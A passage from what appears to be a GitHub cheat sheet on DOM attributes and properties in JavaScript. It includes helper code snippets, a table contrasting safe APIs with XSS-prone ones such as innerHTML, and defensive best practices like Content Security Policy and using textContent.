  • Disable dangerous attribute reflection via sandboxed iframes.
  • Use CSP (script-src, require-trusted-types-for) to prevent DOM-based XSS.
  • Validate element names and IDs before injection.

🧩 11. Property vs Attribute Examples

Element Attribute Property Example
<input value="a"> "a" "a" setAttribute affects markup only
<input> then el.value = "b" "a" "b" Property changed only
<img src="x.png"> "x.png" Absolute URL (http://.../x.png) Browser normalizes URL
<option selected> "" true Boolean reflection

🧠 12. Useful Dev Patterns

// Enumerate all attributes
[...el.attributes].forEach(attr => console.log(attr.name, attr.value));

// Copy attributes to another element
for (const {name, value} of el.attributes) clone.setAttribute(name, value);

// Safely insert text
el.textContent = userInput; // prevents XSS

// Dynamically create element
const btn = Object.assign(document.createElement('button'), {
  type: 'button',
  textContent: 'Click me',
  className: 'safe-btn'
});

🧾 13. Summary Table

Category Safe API Dangerous API Notes
Text insertion textContent, createTextNode innerHTML, outerHTML XSS risk
Attribute setting setAttribute (sanitized) Direct event attributes
Style el.style.property style.cssText from input
Structure appendChild, replaceWith insertAdjacentHTML

βœ… 14. Best Practices

  • Prefer property access over attribute manipulation for live state.
  • Always sanitize input before writing to DOM.
  • Use textContent for user-generated data.
  • Avoid dynamic creation of on* event attributes.
  • Enforce Content Security Policy to block inline scripts.
  • Audit use of innerHTML in client-side templates.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment